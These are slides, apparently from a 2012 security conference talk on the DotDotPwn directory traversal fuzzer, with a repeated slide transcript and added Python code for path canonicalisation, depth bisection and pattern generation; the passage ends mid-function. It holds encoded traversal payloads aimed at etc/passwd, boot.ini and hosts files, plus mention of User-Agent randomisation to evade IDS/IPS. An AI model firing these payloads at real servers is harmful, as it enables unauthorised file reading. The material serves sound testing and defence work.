GuadalajaraCON 2012

../../ DotDotPwn !
The Directory Traversal Fuzzer

Alejandro Hernández H. (nitrØus), CISSP, GPEN   Christian Navarrete (chr1x), GiJOE
http://twitter.com/nitr0usmx                    http://twitter.com/chr1x
<nitrousenador@gmail.com>                       <chr1x@sectester.net>
http://chatsubo-labs.blogspot.com               http://chr1x.sectester.net
http://www.brainoverflow.org
../../ AGENDA
DotDotPwn
      Description
Introduction
      Directory Traversal Vulnerability
      (Intelligent) Fuzz Testing
General Information
      Origin / Evolution
      Design / Architecture
      Usage options
      Website / Contact
      Download
      Contributions
Vulnerabilities
      Discovered vulnerabilities
Traversal Engine
      Description
      Resources
      Fuzz patterns generation
      Intelligent fuzzing
Modules
      Description of each one
Greetings
../../ DotDotPwn and Pentest Magazine
#DoDotPWN @PentestMag
../../ DotDotPwn and HackOS

Coming soon on…
../../ DotDotPwn
Description

README.txt
DotDotPwn is a very flexible, intelligent fuzzer for discovering directory traversal vulnerabilities in
software such as Web/FTP/TFTP servers and Web platforms such as CMSs, ERPs, blogs, etc.
It also has a protocol-independent module that sends the desired payload to the specified host and
port, and it can be driven from scripts through the STDOUT module. It is written in the Perl
programming language and runs on either *NIX or Windows platforms. It is the first Mexican tool
included in BackTrack Linux (BT4 R2).
../../ Introduction
Directory Traversal Vulnerability

A directory traversal (or path traversal) attack exploits insufficient validation / sanitization
of user-supplied file names, so that characters representing "traverse to parent directory" are
passed through to the file APIs.

The goal of this attack is to make an application access a file that is not intended to be
accessible. Directory traversal is also known as the ../ (dot dot slash) attack, directory
climbing, and backtracking. Some forms of this attack are also canonicalization attacks.

A typical example of a vulnerable application in PHP code is:

Source: http://en.wikipedia.org/wiki/Directory_traversal
../../ Introduction
Directory Traversal Vulnerability

An attack against this system could be to send the following HTTP request:

Generating a server response such as:

Source: http://en.wikipedia.org/wiki/Directory_traversal
../../ Introduction
Directory Traversal Vulnerability

Some web applications scan the query string for dangerous characters (to prevent
Directory Traversal vulnerabilities) such as:
 ..
 ..\
 ../

However, the query string is usually URI decoded before use. Therefore these
applications are vulnerable to percent-encoded directory traversal such as:

 %2e%2e%2f which translates to ../
 %2e%2e/ which translates to ../
 ..%2f which translates to ../
 %2e%2e%5c which translates to ..\
 etc.

Source: http://en.wikipedia.org/wiki/Directory_traversal
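As an added example (not code from the slides or from DotDotPwn), the filter the slide describes beside a hardened check. The naive version scans the raw query string for `..`; the hardened version decodes first (repeatedly, to unwrap double encoding such as `%252e`, and with a deliberately lenient byte decoder that models the overlong UTF-8 handling the `..%c0%af` / `..%c1%9c` patterns rely on, which is an assumption about the target's decoder), then normalises the path and accepts it only if it stays under the base directory. The pattern list is a subset of the encoded forms on the slides; the base directory and file names are constructed.

```python
import posixpath
import re

# Encoded traversal forms copied from the slides (a subset; "...." and ..%uF025
# are deliberately left out because their meaning depends on the target platform).
SLIDE_PATTERNS = [
    "%2e%2e%2f", "%2e%2e/", "..%2f", "%2e%2e%5c",
    "..%255c..%255c", "..%c0%2f..%c0%2f", "..%u2215..%u2215",
    "..%25c1%259c..%25c1%259c", "%252e%252e%c0%5c%252e%252e%c0%5c",
]

# Characters folded to '/' after decoding: backslash and U+2215 DIVISION SLASH
# (the slide's ..%u2215 pattern). Deliberately minimal; extend per platform.
SEPARATOR_ALIASES = {"\\": "/", "\u2215": "/"}

_PCT = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
_DOTDOT = re.compile(r"(?:^|/)\.\.(?:/|$)")


def naive_filter_allows(raw: str) -> bool:
    """The check the slide describes: scan the *raw* query string for '..'.
    It never sees '%2e%2e%2f', so the encoded form passes straight through."""
    return ".." not in raw and "../" not in raw


def lenient_utf8(b: bytes) -> str:
    """Decode bytes the way a permissive decoder does (modelling assumption):
    a 0xC0/0xC1 lead byte, which strict UTF-8 rejects as overlong, is accepted,
    so c0 af -> '/', c1 9c -> '\\', and an ASCII byte after a bogus lead is
    kept as-is (c0 2f -> '/'). Everything else goes through the strict decoder."""
    chars, i = [], 0
    while i < len(b):
        lead = b[i]
        if lead < 0x80:
            chars.append(chr(lead))
            i += 1
        elif lead in (0xC0, 0xC1) and i + 1 < len(b):
            nxt = b[i + 1]
            chars.append(chr(nxt) if nxt < 0x80
                         else chr(((lead & 0x1F) << 6) | (nxt & 0x3F)))
            i += 2
        else:
            n = 2 if lead <= 0xDF else 3 if lead <= 0xEF else 4
            chars.append(b[i:i + n].decode("utf-8", "replace"))
            i += n
    return "".join(chars)


def decode_once(s: str) -> str:
    """One pass of percent-decoding: %uXXXX (IIS style) becomes that code
    point, runs of %XX are gathered as bytes and fed to lenient_utf8()."""
    out, buf, pos = [], bytearray(), 0

    def flush():
        if buf:
            out.append(lenient_utf8(bytes(buf)))
            buf.clear()

    for m in _PCT.finditer(s):
        if m.start() > pos:
            flush()
            out.append(s[pos:m.start()])
        if m.group(1):
            flush()
            out.append(chr(int(m.group(1), 16)))
        else:
            buf.append(int(m.group(2), 16))
        pos = m.end()
    flush()
    out.append(s[pos:])
    return "".join(out)


def canonicalize(raw: str, max_rounds: int = 3) -> str:
    """Decode until stable (unwraps %252e -> %2e -> .), then fold separator aliases."""
    s = raw
    for _ in range(max_rounds):
        nxt = decode_once(s)
        if nxt == s:
            break
        s = nxt
    return "".join(SEPARATOR_ALIASES.get(c, c) for c in s)


def is_traversal(raw: str) -> bool:
    """Detection view (IDS rule / log review): does the canonical form contain a '..' segment?"""
    return _DOTDOT.search(canonicalize(raw)) is not None


def resolve_under(base: str, raw: str):
    """Hardened server-side check: join the canonical relative path to the base
    directory, normalise it, and accept only if it is still inside base.
    Containment is decided on the normalised path, not by scanning for '..'."""
    rel = canonicalize(raw).lstrip("/")
    full = posixpath.normpath(posixpath.join(base, rel))
    root = base.rstrip("/")
    return full if full == root or full.startswith(root + "/") else None
```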
../../ Introduction
Directory Traversal Vulnerability

According to a study by Imperva on Web Application Attacks, Directory Traversal is
one of the most common attacks nowadays (July 2011).

Source: Imperva’s Web Application Attack Report. Edition #1 - July 2011
../../ Introduction
Fuzz Testing

Fuzz testing or fuzzing is a software testing technique that provides (in)valid,
unexpected, or random data to the inputs of a program. If the program fails (for
example, by crashing or failing built-in code assertions), the defects can be
noted.

Fuzz testing enhances software security and software safety because it often
finds odd oversights and defects which human testers would fail to find, and
even careful human test designers would fail to create tests for.

Source: http://en.wikipedia.org/wiki/Fuzz_testing
../../ Introduction
Intelligent Fuzz Testing

Source: DeMott, J. (2006). The evolving art of fuzzing.
../../ General Information
Origin / Evolution

CHANGELOG.txt
DotDotPwn v1.0
Release date: 21/Aug/2010
      Checker Script
      Core component: Traversal database (external .txt files) with 881 payloads
      Based on Shlomi Narkolayev’s Directory Traversal Cheat Sheet
            http://narkolayev-shlomi.blogspot.com/2010/04/directory-traversal-fuzz-list.html

DotDotPwn v2.1
Release date: 29/Oct/2010 (BugCon Security Conferences 2010)
      From Checker to Fuzzer
      Rewritten from scratch
      Modular architecture (DotDotPwn packages)
      Core component: Traversal Engine
      OS detection (nmap)
      A cool banner was included ;)
      False positives detection
      Many parameters included for fuzzing flexibility
      More modules included

DotDotPwn v3.0beta
Release date: 03/Aug/2011 (Black Hat USA 2011 (Arsenal) - Conference CD)
      Random User-Agent in HTTP requests
      Operating System type specifier (if known)
      Reporting capabilities
../../ General Information
Design / Architecture

[Architecture diagram: INPUTS -> FUZZ PATTERNS CREATION -> OUTPUTS]

INPUTS
      manual OS type
      OS detection
      Deepness
      Filenames

FUZZ PATTERNS CREATION
      Traversal Engine (Dots & Slashes Encodings), e.g.:
            ../../
            ....
            ..%2f..%2f
            ..%255c..%255c
            ..%c0%2f..%c0%2f
            ..%u2215..%u2215
            ..%uF025..%uF025
            ..%25c1%259c..%25c1%259c
            %252e%252e%c0%5c%252e%252e%c0%5c

OUTPUTS
      Modules
            HTTP
            HTTP URL
            FTP
            TFTP
            PAYLOAD
            STDOUT
../../ General Information
Usage options

USAGE.txt

../../ General Information
Usage options

EXAMPLES.txt (one example per module)
../../ General Information
Website / Contact

README.txt

Official Website: http://dotdotpwn.sectester.net
Official Email: dotdotpwn@sectester.net
Bugs / Contributions / Improvements: dotdotpwn@sectester.net
../../ General Information
Download

DotDotPwn v3.0beta:
INCLUDED IN BLACK HAT USA 2011 CONFERENCE CD

DotDotPwn v2.1:

PacketStormSecurity:
http://packetstormsecurity.org/files/view/95399/dotdotpwn-v2.1.tar.gz

BackTrack Linux 4 R2:
# apt-get update
# apt-get install dotdotpwn
# cd /pentest/fuzzers/dotdotpwn/
# ./dotdotpwn.pl

Mirror:
http://www.brainoverflow.org/code/dotdotpwn-v2.1.tar.gz
../../ General Information
Contributions

AUTHORS.txt
Contribution: Idea
Implementation of the Bisection Algorithm (http://en.wikipedia.org/wiki/Bisection_method) once a vulnerability has been
found, in order to determine the exact deepness of the directory traversal. Origin of the -X switch.

By: Roberto Salgado aka LightOS
      http://twitter.com/LightOS
      http://www.websec.ca
-------------------------------------
Contribution: Idea and Code
Option not to always include the @Extra_files (e.g. web.config, httpd.conf, etc.). Origin of the -e switch.
Specify the Operating System type if known ("windows" or "unix"). Origin of the -o switch.

By: Eduardo Ruiz Duarte aka Beck
      http://twitter.com/toorandom
      http://math.co.ro
      http://b3ck.blogspot.com
-------------------------------------
Contribution: Code
Save a results report into the Reports folder. Origin of the -r switch.
Handling of SIGINT in order to print the number of traversals found when Ctrl + C is pressed.
Random User-Agent in HTTP requests for IDS/IPS detection avoidance.

By: Diego Boy
      http://twitter.com/Diego_Boy
-------------------------------------
Contribution: Code
Random User-Agent in HTTP requests for IDS/IPS detection avoidance.

By: Cristian Urrutia aka Gashnark
    http://twitter.com/blion_tec
../../ General Information
To Do

Implementation of the Bisection Algorithm to determine
the exact deepness of the directory traversal.

The bisection method, in mathematics, is a root-finding method that
repeatedly bisects an interval and then selects the subinterval in which a root must
lie for further processing.

Source: http://en.wikipedia.org/wiki/Bisection_method

Applied to traversal depth: once a traversal has been found at depth 16, each step halves
the interval between the deepest depth known to fail and the shallowest depth known to work:

 ../../../../../../../../../../../../../../../../etc/passwd    (16)

 ../../../../../../../../etc/passwd         (16/2 = 8)

 ../../../../../../../../../../../../etc/passwd         ((8+16) / 2 = 12)

 ../../../../../../../../../../etc/passwd         ((8+12) / 2 = 10)

 ../../../../../../../../../../../etc/passwd               ((10+12) / 2 = 11)

                               5 requests instead of 11 !
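The depth search above as an added example (not DotDotPwn's own -X implementation). The server is replaced by a constructed oracle that answers "works" exactly when the probe depth reaches the document root's real depth, which is the monotonicity assumption the bisection relies on; the slide's scenario (first hit at depth 16, real depth 11) is reproduced and compared with counting up linearly.

```python
from typing import Callable, List, Tuple


def traversal_path(depth: int, target: str = "etc/passwd") -> str:
    """Build the probe string for a given depth, e.g. depth 3 -> '../../../etc/passwd'."""
    return "../" * depth + target


def bisect_min_depth(works: Callable[[int], bool],
                     found_depth: int) -> Tuple[int, List[int]]:
    """Given a depth at which the traversal already succeeded, find the smallest
    depth that still succeeds. Assumes monotonicity: if depth d reaches the
    target, every deeper probe does too (surplus ../ at the filesystem root are
    ignored). Returns (min_depth, depths probed after the first hit)."""
    lo, hi = 0, found_depth          # lo is assumed to fail, hi is known to work
    probed = []
    while hi - lo > 1:
        mid = (lo + hi) // 2
        probed.append(mid)
        if works(mid):
            hi = mid                 # still works: the answer is at mid or shallower
        else:
            lo = mid                 # fails: the answer is deeper than mid
    return hi, probed


def linear_min_depth(works: Callable[[int], bool],
                     max_depth: int) -> Tuple[int, int]:
    """The naive alternative: count up from 1. Returns (min_depth, requests sent)."""
    for depth in range(1, max_depth + 1):
        if works(depth):
            return depth, depth
    return 0, max_depth


def simulated_target(real_depth: int) -> Callable[[int], bool]:
    """Constructed stand-in for a vulnerable server whose document root sits
    real_depth directories below '/': a probe succeeds iff depth >= real_depth."""
    return lambda depth: depth >= real_depth


def compare(found_depth: int = 16, real_depth: int = 11) -> dict:
    """Reproduce the slide's scenario: first hit at depth 16, true depth 11."""
    works = simulated_target(real_depth)
    min_depth, probed = bisect_min_depth(works, found_depth)
    _, lin_requests = linear_min_depth(works, found_depth)
    return {
        "min_depth": min_depth,
        "probed": probed,
        "bisection_requests": 1 + len(probed),   # the initial hit plus the probes
        "linear_requests": lin_requests,
        "paths": [traversal_path(d) for d in [found_depth] + probed],
    }
```

If the target is not monotone (an application that rejects over-long paths, for example), the result should be confirmed with one extra probe at min_depth - 1 before it is reported.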
../../ Vulnerabilities
Discovered vulnerabilities

Tested software
      HTTP: 72
      Web platforms: 2 (CMSs)
      FTP: 25
      TFTP: 11
../../ Vulnerabilities
Discovered vulnerabilities

Examples of findings …
../../ Vulnerabilities
Discovered vulnerabilities

Exploits

 MultiThreaded HTTP Server [chr1x] - http://www.exploit-db.com/exploits/12304
 Wing FTP Server v3.4.3 [chr1x] - http://packetstormsecurity.org/1005-exploits/wingftp-traversal.txt
 VicFTPS v5.0 [chr1x] - http://www.exploit-db.com/exploits/12498
 TFTP Desktop 2.5 [chr1x] - http://www.exploit-db.com/exploits/14857
 TFTPDWIN v0.4.2 [chr1x] - http://www.exploit-db.com/exploits/14856
 Femitter FTP Server 1.04 [chr1x] - http://www.exploit-db.com/exploits/15445
 Home FTP Server <= r1.11.1 (build 149) [chr1x] - http://www.exploit-db.com/exploits/15349
 Yaws 1.89 HTTP Server [nitrØus] - http://www.exploit-db.com/exploits/15371
 Mongoose 2.11 HTTP Server (Win32) [nitrØus] - http://www.exploit-db.com/exploits/15373
../../ Vulnerabilities
Discovered vulnerabilities

DotDotPwn iz Breaking Patches!

      3.4.5 - 2nd Traversal found !
      3.4.3
      3.4.2
      3.4.1
      3.4.0 - 1st Traversal found !
      =================
      56 days of exposure!!
../../ Traversal Engine
Description

Traversal Engine
      ../../
      ....
      ..%2f..%2f
      ..%255c..%255c
      ..%c0%2f..%c0%2f
      ..%u2215..%u2215
      ..%uF025..%uF025
      ..%25c1%259c..%25c1%259c
      %252e%252e%c0%5c%252e%252e%c0%5c
../../ Traversal Engine
Resources
../../ Traversal Engine
Fuzz patterns generation
../../ Traversal Engine
Intelligent Fuzzing

At the beginning of this presentation …

Then …
../../ Traversal Engine
Intelligent Fuzzing

Fuzz patterns according to the Operating System detected (nmap): each target file is
paired with the platform it belongs to, so Windows files are not requested from *NIX-like
hosts and vice versa.

 ../../../boot.ini on *NIX-like (wrong pairing)       ../../../boot.ini on Windows (right pairing)

 ../../../etc/passwd on Windows (wrong pairing)       ../../../etc/passwd on *NIX-like (right pairing)
../../ Traversal Engine
Intelligent Fuzzing

Encoding of slashes (/) for the correct semantics in the fuzzing patterns: the
separators inside the target filename receive the same encoding as the traversal prefix.

 ..%2f..%2fetc/passwd

 ..%2f..%2fetc%2fpasswd


 %2e%2e%c0%af%2e%2e%c0%afwindows\system32\drivers\etc\hosts

 %2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts
../../ Modules
HTTP

Snort / Suricata signature (msg prefix "ET SCAN") for the DotDotPwn User-Agent string:

 #DotDotPwn
 #snort-2.8.4 - snort-2.9.x, and suricata
 alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS
 (msg:"ET SCAN DotDotPwn User-Agent"; flow: established,to_server;
 content:"User-Agent|3A| DotDotPwn"; nocase; http_header; threshold:
 type limit, track by_src,count 1, seconds 60; classtype: attempted-recon;
 reference:url,dotdotpwn.sectester.net; sid:yyyyyy; rev:1;)
../../ Modules
HTTP

Additional verification to avoid false positives
../../ Modules
HTTP URL

../../ Modules
FTP
../../ Modules
FTP

Compliance with RFC 959 - File Transfer Protocol
Double testing approach:
      CD <directory> & GET <file>
      GET <directory><file>
../../ Modules
TFTP
../../ Modules
TFTP

A small hack in the TFTP.pm module’s constructor to improve the
testing speed (-t switch in DotDotPwn)
../../ Modules
PAYLOAD

../../ Modules
STDOUT
../../ Upcoming release…

DotDotPwn v4.0

…Stay tuned.
../../ Greetings

 r1l0, b0rr3x, l1l1th, chipx0r, preth00nker, NataS, Darko, beck, Daemon, dex,
Alination, Carlos Ayala, hkm, calderpwn, tr3w, hecky, raito, BelindoFan etc etc…

 Helga alt3kx :**

 Contributors

 GuadalajaraCON Crew

 www.underground.org.mx

 #mendozaaaa

 CRAc, hkm, alt3kx, tr3w, beck, cldrn, LightOS, xScPx, Daemon, SirDarckCat,
Rolman, Crypkey, KBrown, nediam, beavis, kaz, Carlos A. Ayala, corelanc0d3r,
Héctor López, Raaka (el_gaupo), dex, Cj, preth00nker, Humberto Ochoa, ch0ks,
ran, Federico L. Bossi Bonin, Bucio, javi3r, sunLevy, Zeus, etc…
../../ Funny time!
../../ Thanks !
chr1x & nitrØus @ Solar Vision 3

Alejandro Hernández H. (nitrØus), CISSP, GPEN   Christian Navarrete (chr1x), GiJOE
DotDotPwn v3.0 [GuadalajaraCON 2012]

  • 1. GuadalajaraCON 2012 ../../ DotDotPwn ! The Directory Traversal Fuzzer Alejandro Hernández H. (nitrØus), CISSP, GPEN Christian Navarrete (chr1x), GiJOE http://twitter.com/nitr0usmx http://twitter.com/chr1x <nitrousenador@gmail.com> <chr1x@sectester.net> http://chatsubo-labs.blogspot.com http://chr1x.sectester.net http://www.brainoverflow.org
  • 2. ../../ AGENDA DotDotPwn  Description Introduction  Directory Traversal Vulnerability  (Intelligent) Fuzz Testing General Information  Origin / Evolution  Design / Architecture  Usage options  Website / Contact  Download  Contributions Vulnerabilities  Discovered vulnerabilities Traversal Engine  Description  Resources  Fuzz patterns generation  Intelligent fuzzing Modules  Description of each one Greetings C
  • 3. ../../ DotDotPwn and Pentest Magazine #DoDotPWN @PentestMag C
  • 4. ../../ DotDotPwn and HackOS Proximamente en…. C
  • 5. ../../ DotDotPwn Description README.txt It’s a very flexible intelligent fuzzer to discover directory traversal vulnerabilities in software such as Web/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module. It's written in perl programming language and can be run either under *NIX or Windows platforms. It’s the first Mexican tool included in BackTrack Linux (BT4 R2). C
  • 6. ../../ Introduction Directory Traversal Vulnerability A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. The goal of this attack is to order an application to access a computer file that is not intended to be accessible. Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks. A typical example of vulnerable application in php code is: Source: http://en.wikipedia.org/wiki/Directory_traversal C
  • 7. ../../ Introduction Directory Traversal Vulnerability An attack against this system could be to send the following HTTP request: Generating a server response such as: Source: http://en.wikipedia.org/wiki/Directory_traversal C
  • 8. ../../ Introduction Directory Traversal Vulnerability Some web applications scan query string for dangerous characters (to prevent Directory Traversal vulnerabilities) such as: .. .. ../ However, the query string is usually URI decoded before use. Therefore these applications are vulnerable to percent encoded directory traversal such as: %2e%2e%2f which translates to ../ %2e%2e/ which translates to ../ ..%2f which translates to ../ %2e%2e%5c which translates to .. etc. Source: http://en.wikipedia.org/wiki/Directory_traversal C
  • 9. ../../ Introduction Directory Traversal Vulnerability According to a study done by Imperva about Web Applications Attacks, the Directory Traversal vulnerability is one of the most common attacks nowadays (July 2011) Source: Imperva’s Web Application Attack Report. Edition #1 - July 2011 C
  • 10. ../../ Introduction Fuzz Testing Fuzz testing or fuzzing is a software testing technique that provides (in)valid, unexpected, or random data to the inputs of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted. Fuzz testing enhances software security and software safety because it often finds odd oversights and defects which human testers would fail to find, and even careful human test designers would fail to create tests for. Source: http://en.wikipedia.org/wiki/Fuzz_testing C
  • 11. ../../ Introduction Intelligent Fuzz Testing Source: N DeMott, J. (2006). The evolving art of fuzzing.
  • 12. ../../ Introduction Intelligent Fuzz Testing Source: N DeMott, J. (2006). The evolving art of fuzzing.
  • 13. ../../ Introduction Intelligent Fuzz Testing Source: N DeMott, J. (2006). The evolving art of fuzzing.
  • 14. ../../ General Information Origin / Evolution CHANGELOG.txt DotDotPwn v1.0 Release date: 21/Aug/2010  Checker Script  Core component: Traversal database (external .txt files) with 881 payloads  Based on Shlomi Narkolayev’s Directory Traversal Cheat Sheet  http://narkolayev-shlomi.blogspot.com/2010/04/directory-traversal-fuzz-list.html DotDotPwn v2.1 Release date: 29/Oct/2010 (BugCon Security Conferences 2010)  From Checker to Fuzzer  Rewritten from the scratch  Modular architechture (DotDotPwn packages)  Core component: Traversal Engine  OS detection (nmap)  A cool banner was included ;)  False positives detection  Many parameters included for fuzzing flexibility  More modules included DotDotPwn v3.0beta Release date: 03/Aug/2011 (Black Hat USA 2011 (Arsenal) - Conference CD)  Random User-Agent in HTTP requests  Operating System type specifier (if known)  Reporting capabilities C
• 15. ../../ General Information Design / Architecture (diagram)
  Inputs: manual OS type, URL, deepness, filenames, dots & slashes encodings
  Fuzz patterns creation: Traversal Engine, OS detection; sample patterns: ../../ .... ..%2f..%2f ..%255c..%255c ..%c0%2f..%c0%2f ..%u2215..%u2215 ..%uF025..%uF025 ..%25c1%259c..%25c1%259c %252e%252e%c0%5c%252e%252e%c0%5c
  Outputs (modules): HTTP, HTTP URL, FTP, TFTP, PAYLOAD, STDOUT C
  • 16. ../../ General Information Usage options USAGE.txt N
  • 17. ../../ General Information Usage options EXAMPLES.txt (one example per module) C
  • 18. ../../ General Information Website / Contact README.txt Official Website: http://dotdotpwn.sectester.net Official Email: dotdotpwn@sectester.net Bugs / Contributions / Improvements: dotdotpwn@sectester.net C
• 19. ../../ General Information Download
DotDotPwn v3.0beta: INCLUDED IN BLACK HAT USA 2011 CONFERENCE CD
DotDotPwn v2.1:
  - PacketStormSecurity: http://packetstormsecurity.org/files/view/95399/dotdotpwn-v2.1.tar.gz
  - BackTrack Linux 4 R2:
      # apt-get update
      # apt-get install dotdotpwn
      # cd /pentest/fuzzers/dotdotpwn/
      # ./dotdotpwn.pl
  - Mirror: http://www.brainoverflow.org/code/dotdotpwn-v2.1.tar.gz N
• 20. ../../ General Information Contributions AUTHORS.txt
Contribution: Idea
  Implementation of the Bisection Algorithm (http://en.wikipedia.org/wiki/Bisection_method) once a vulnerability has been found in order to determine the exact deepness of the directory traversal. Origin of the -X switch.
  By: Roberto Salgado aka LightOS http://twitter.com/LightOS http://www.websec.ca
-------------------------------------
Contribution: Idea and Code
  Not always including the @Extra_files (e.g. web.config, httpd.conf, etc.). Origin of the -e switch.
  Specifying the Operating System type if known ("windows" or "unix"). Origin of the -o switch.
  By: Eduardo Ruiz Duarte aka Beck http://twitter.com/toorandom http://math.co.ro http://b3ck.blogspot.com
-------------------------------------
Contribution: Code
  Saving a results report into the Reports folder. Origin of the -r switch.
  Treatment of SIGINT in order to print the number of traversals found when Ctrl + C is pressed.
  Random User-Agent in HTTP requests for IDS/IPS detection avoidance.
  By: Diego Boy http://twitter.com/Diego_Boy
-------------------------------------
Contribution: Code
  Random User-Agent in HTTP requests for IDS/IPS detection avoidance.
  By: Cristian Urrutia aka Gashnark http://twitter.com/blion_tec N
• 21. ../../ General Information To Do
  - Implementation of the Bisection Algorithm to determine the exact deepness of the directory traversal.
    "The bisection method in mathematics is a root-finding method which repeatedly bisects an interval and then selects a subinterval in which a root must lie for further processing." Source: http://en.wikipedia.org/wiki/Bisection_method
    ../../../../../../../../../../../../../../../../etc/passwd (16)
    ../../../../../../../../etc/passwd (16/2 = 8)
    ../../../../../../../../../../../../etc/passwd ((8+16) / 2 = 12)
    ../../../../../../../../../../etc/passwd ((8+12) / 2 = 10)
    ../../../../../../../../../../../etc/passwd ((10+12) / 2 = 11)
    5 requests instead of 11! N
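As an added example (not DotDotPwn's own -X implementation, which this slide lists as to-do), the bisection search below finds the exact traversal depth against a simulated target. The probe, the document-root depth of 11 and the etc/passwd target are constructed here so the code runs offline; with a maximum depth of 16 it reproduces the 16, 8, 12, 10, 11 sequence from the slide and compares it with the naive one-depth-at-a-time approach.

```python
# Added example, not DotDotPwn's own code: bisection search for the exact
# traversal depth, run against a simulated target so it works offline.

def traversal_payload(depth, target="etc/passwd"):
    """Build a plain ../ traversal of the given depth (target is an assumed default)."""
    return "../" * depth + target


def make_simulated_probe(real_depth):
    """Return a probe simulating a vulnerable server whose document root sits
    `real_depth` directories below the filesystem root (constructed value).
    A payload succeeds once it climbs at least that far; surplus ../ at the
    root are dropped by path normalization, so deeper payloads keep working.
    A real probe would send the request and verify that the file content came
    back (for /etc/passwd, a line starting with 'root:'), not just an HTTP 200,
    which is the check that avoids false positives."""
    def probe(depth):
        return depth >= real_depth
    return probe


def linear_depth(probe, max_depth):
    """Naive approach: try depth 1, 2, 3, ... until the first hit.
    Returns (depth or None, list of depths requested)."""
    requested = []
    for depth in range(1, max_depth + 1):
        requested.append(depth)
        if probe(depth):
            return depth, requested
    return None, requested


def bisect_depth(probe, max_depth):
    """Bisection: confirm the deepest payload works, then keep a failing lower
    bound and a working upper bound and halve the gap until they are adjacent.
    Returns (exact depth or None, list of depths requested)."""
    requested = []

    def ask(depth):
        requested.append(depth)
        return probe(depth)

    if not ask(max_depth):
        return None, requested        # no traversal at all up to max_depth
    low, high = 0, max_depth          # depth 0 is no traversal: counted as failing without a request
    while high - low > 1:
        mid = (low + high) // 2
        if ask(mid):
            high = mid                # works: the exact depth is mid or shallower
        else:
            low = mid                 # fails: the exact depth is deeper than mid
    return high, requested


if __name__ == "__main__":
    probe = make_simulated_probe(11)  # constructed: document root 11 levels deep
    depth, asked = bisect_depth(probe, 16)
    print("exact depth:", depth, "->", traversal_payload(depth))  # 11
    print("bisection requests:", asked)                           # [16, 8, 12, 10, 11]
    print("linear requests:", len(linear_depth(probe, 16)[1]))   # 11
```

The invariant is that `low` always fails and `high` always works, so the loop needs only log2(16) probes after the initial confirmation; if the deepest payload does not work the search stops after that single request instead of guessing.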
• 22. ../../ Vulnerabilities Discovered vulnerabilities
Tested software:
  - HTTP: 72
  - Web platforms: 2 (CMSs)
  - FTP: 25
  - TFTP: 11 C
• 24. ../../ Vulnerabilities Discovered vulnerabilities Exploits
  - MultiThreaded HTTP Server [chr1x] - http://www.exploit-db.com/exploits/12304
  - Wing FTP Server v3.4.3 [chr1x] - http://packetstormsecurity.org/1005-exploits/wingftp-traversal.txt
  - VicFTPS v5.0 [chr1x] - http://www.exploit-db.com/exploits/12498
  - TFTP Desktop 2.5 [chr1x] - http://www.exploit-db.com/exploits/14857
  - TFTPDWIN v0.4.2 [chr1x] - http://www.exploit-db.com/exploits/14856
  - Femitter FTP Server 1.04 [chr1x] - http://www.exploit-db.com/exploits/15445
  - Home FTP Server <= r1.11.1 (build 149) [chr1x] - http://www.exploit-db.com/exploits/15349
  - Yaws 1.89 HTTP Server [nitrØus] - http://www.exploit-db.com/exploits/15371
  - Mongoose 2.11 HTTP Server (Win32) [nitrØus] - http://www.exploit-db.com/exploits/15373 N
• 25. ../../ Vulnerabilities Discovered vulnerabilities (version timeline)
  3.4.5 - 2nd traversal found!
  3.4.3 - DotDotPwn iz Breaking Patches!
  3.4.2
  3.4.1
  3.4.0 - 1st traversal found!
  =================
  56 days of exposure!! C
• 26. ../../ Traversal Engine Description
Traversal Engine patterns (examples):
  ../../
  ....
  ..%2f..%2f
  ..%255c..%255c
  ..%c0%2f..%c0%2f
  ..%u2215..%u2215
  ..%uF025..%uF025
  ..%25c1%259c..%25c1%259c
  %252e%252e%c0%5c%252e%252e%c0%5c N
  • 29. ../../ Traversal Engine Fuzz patterns generation N
• 30. ../../ Traversal Engine Intelligent Fuzzing At the beginning of this presentation … Then … N
• 31. ../../ Traversal Engine Intelligent Fuzzing
  - Fuzz patterns according to the Operating System detected (nmap):
      ../../../boot.ini on *NIX-like and ../../../etc/passwd on Windows (mismatched OS and file)
      ../../../boot.ini on Windows and ../../../etc/passwd on *NIX-like (matching OS and file) N
• 33. ../../ Traversal Engine Intelligent Fuzzing
  - Encoding of slashes (/) for the correct semantics in the fuzzing patterns:
      ..%2f..%2fetc/passwd
      ..%2f..%2fetc%2fpasswd
      %2e%2e%c0%af%2e%2e%c0%afwindows\system32\drivers\etc\hosts
      %2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts N
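The following Python is added here and is not the Perl Traversal Engine itself; it builds patterns the way slides 26 to 33 describe: dot encodings crossed with separator encodings for each depth, target files chosen by operating system, and the separators inside the target path encoded the same way as the traversal separators so the whole pattern is consistent. The encoding lists are taken from the patterns shown on these slides; their split into "dots" and "separators", the etc/passwd, boot.ini and hosts targets, and the function names are this example's own choices.

```python
import itertools

# Added example, not the DotDotPwn Traversal Engine: generate directory
# traversal fuzz patterns from dot encodings x separator encodings x depth,
# choosing target files by operating system and encoding the separators inside
# the target path the same way as the traversal separators.

# Encodings taken from the patterns shown on the slides; splitting them into
# "dots" and "separators" is this example's own grouping.
DOT_ENCODINGS = ("..", "%2e%2e", "%252e%252e")
SEPARATOR_ENCODINGS = ("/", "\\", "%2f", "%5c", "%255c", "%c0%2f", "%c0%af",
                       "%c0%5c", "%u2215", "%uF025", "%25c1%259c")

# OS-aware targets (assumed set): a *NIX host gets etc/passwd, a Windows host
# boot.ini and the hosts file, so no request asks a Windows box for etc/passwd.
TARGET_FILES = {
    "unix": ("etc/passwd",),
    "windows": ("boot.ini", "windows\\system32\\drivers\\etc\\hosts"),
}


def encode_target(target, separator):
    """Rewrite the separators inside the target path with the encoding used for
    the traversal itself, so the whole pattern has consistent semantics
    (etc/passwd with %2f becomes etc%2fpasswd)."""
    return target.replace("/", separator).replace("\\", separator)


def generate_patterns(os_type, max_depth, extra_files=()):
    """Return every pattern for depths 1..max_depth as a list of strings.
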